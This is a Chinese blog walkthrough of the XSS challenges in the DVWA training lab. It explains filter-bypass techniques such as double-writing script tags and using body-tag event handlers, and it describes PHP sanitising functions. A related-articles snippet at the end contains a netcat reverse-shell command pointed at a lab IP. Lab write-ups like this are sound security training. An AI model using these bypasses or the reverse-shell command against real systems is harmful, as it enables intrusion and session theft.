首页 > 其他分享 >DVWA-XSS靶场通关攻略

DVWA-XSS靶场通关攻略

时间:2023-01-07 21:44:16浏览次数:42  
标签:XSS 函数 字符 标签 DVWA 攻略 弹窗 string

DVWA-XSS跨站脚本攻击

一、难度low

1.XSS(Reflected)

直接输入payload

1

成功弹窗

2

2.xss(Stored)

同上,直接在message框中输入payload即可

二、难度Medium

1.XSS(Reflected)

直接输入payload发现输出结果变了并且没有弹框

3

查看元素发现<script>被过滤了

4

再查看代码得知<script>被替换成空

5

看到替换成空,第一时间想到双写绕过!!!

6

成功弹窗

7

2.xss(Stored)

先查看代码,寻找过滤

8

addslashes():在特殊符号前加转义符

strip_tags:删除html标签

所以把name出作为突破口(过滤更简单)

在name出插入xss语句(要双写!),发现有长度限制,查看元素修改

9

成功弹窗

三、难度High

1.XSS(Reflected)

查看代码可知,使用了正则表达式(.* 任意字符任意长度),<script>会被替换成空

10

所以无法使用<script>标签了,可与改用<body>标签(其他标签也可以)

11

成功弹窗

13

实际上,标准写法为

12

也可以去掉引号/分号,因为html语言兼容性很高

preg、re、/xxxxx/x格式可能为正则表达式!!!

2.xss(Stored)

查看代码

14

与前面思路相同

在name框输入payload,且有长度限制,需要修改长度

15

成功弹窗

补充函数

①trim(string,charlist)函数移除字符串两侧的空白字符或其他预定义字符,预定义字符包括、\t、\n、\x0B、\r以及空格,可选参数charlist支持添加额外需要删除的字符

②mysql_real_escape_string(string,connection)函数会对字符串中的特殊符号(\x00,\n,\r,\,‘,“,\x1a)进行转义

③stripslashes(string)函数删除字符串中的反斜杠

④htmlspecialchars函数把预定义的字符&、”、 ’、<、>转换为HTML 实体,防止浏览器将其作为HTML 元素去执行

⑤preg_replace()函数用于正则表达式的搜索和替换,这使得双写绕过、大小写混淆绕过(正则表达式中i表示不区分大小写)不再有效

⑥strip_tags() 函数剥去字符串中的HTML、XML以及PHP的标签,但允许使用标签

⑦addslashes() 函数返回在预定义字符(单引号、双引号、反斜杠、NULL)之前添加反斜杠的字符串,即进行了转义

标签:XSS,函数,字符,标签,DVWA,攻略,弹窗,string
From: https://www.cnblogs.com/vinslow/p/17033604.html

相关文章

  • XSS跨站脚本漏洞
    XSS跨站脚本漏洞一、XSS跨站脚本概念1.攻击目标动态网页的邮件、留言板、论坛、搜索栏等(直接攻击客户端浏览器)2.xss的危害①网络钓鱼,包括盗取各类用户账号②窃取用......
  • 使用XSS漏洞获取cookies
    使用XSS漏洞获取cookies一、前期准备火狐为受害者,已经登陆到DVWAchrome为攻击者,没有登陆权限/可以登录,但权限不如火狐高在火狐输入xss语句获取cookie,使用chrome登录其......
  • CVPR一区审稿人分享:图像分割论文通关攻略
    上个月,一个读者发私信问我,他目前研究方向是图像分割,想弃坑了。因为实验室就只有他一个人做这个方向,导师没有数据集,什么建设性意见都没有;只能自己在网上找开源数据集,问我有没......
  • DVWA靶场实战(四)——File Inclusion
    DVWA靶场实战(四)四、FileInclusion:1.漏洞原理:随着网站的业务的需求,程序开发人员一般希望代码更加灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵......
  • DVWA靶场实战(三)——CSRF
    DVWA靶场实战(三)三、CSRF:1.漏洞原理:CSRF(Cross-siterequestforgery),中文名叫做“跨站请求伪造”,也被称作“oneclickattack/sessionriding”,缩写为“CSRF/XSRF”......
  • DVWA靶场实战(二)——Command Injection
    DVWA靶场实战(二)二、CommandInjection:1.漏洞介绍:CommandInjection,中文叫做命令注入,是指通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。PH......
  • WAS 补丁攻略
    WAS补丁攻略有些日子没搞Websphere了,之前收到不少IBM送的光盘,4-6的版本都有,IBM去年开始发行6.0,现在已经到了6.2的版本,其中的小版本比较复杂。一般对版本的定义是:x.x.x......
  • 从0开始做游戏之保姆级攻略(2)
    你立下了雄心壮志,你要做游戏!然后呢……你踌躇满志地在电脑前,不知道从哪里开始…… 我建议你从详细的游戏策划开始。 附上我独立游戏的研发日志,也就是策划案,供你参考(见......
  • AI:Python与人工智能相关的库/框架(机器学习&深度学习&数据科学/计算机视觉/自然语言处
    ​​Python与人工智能相关的库/框架(机器学习&深度学习&数据科学/计算机视觉/自然语言处理)的简介、案例应用​​​​1、以机器学习为主相关库​​​​2、以深度学习为主的......
  • DVWA之Command Execution篇
    CommandExecution靶机基本情况Metasploitable2中的DVWALevel:Low构造语句:;nc-e/bin/bash192.168.176.1285555其中192.168.176.128为KaliLinuxIP地址可以......